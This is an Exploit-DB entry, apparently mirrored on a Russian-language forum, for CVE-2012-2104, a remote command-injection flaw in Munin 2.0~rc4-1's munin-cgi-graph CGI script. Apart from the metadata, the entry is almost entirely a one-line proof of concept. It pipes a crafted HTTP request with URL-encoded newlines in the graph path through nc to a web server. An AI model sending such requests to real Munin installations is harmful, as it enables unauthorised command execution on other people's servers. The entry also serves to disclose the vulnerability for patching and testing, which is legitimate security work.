- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37084
- Проверка EDB
-
- Пройдено
- Автор
- HELMUT GROHNE
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- cve-2012-2104
- Дата публикации
- 2012-04-13
Munin 2.0~rc4-1 - Remote Command Injection
Код:
source: https://www.securityfocus.com/bid/53032/info
Munin is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application.
printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80- Источник
- www.exploit-db.com
